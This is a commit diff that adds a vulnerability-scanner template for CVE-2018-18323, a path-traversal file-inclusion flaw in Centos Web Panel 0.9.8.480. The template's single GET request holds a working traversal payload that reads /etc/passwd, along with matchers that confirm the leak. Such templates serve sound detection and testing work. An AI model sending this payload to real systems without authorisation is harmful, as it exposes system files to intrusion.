commit
ec4360339e
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2018-18323
|
||||
info:
|
||||
name: Centos Web Panel 0.9.8.480 LFI
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: Centos Web Panel version 0.9.8.480 suffers from code execution, cross site scripting, and local file inclusion vulnerabilities.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html
|
||||
- http://centos-webpanel.com/
|
||||
- https://www.cvedetails.com/cve/CVE-2018-18323
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2018-18323
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2018,centos,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue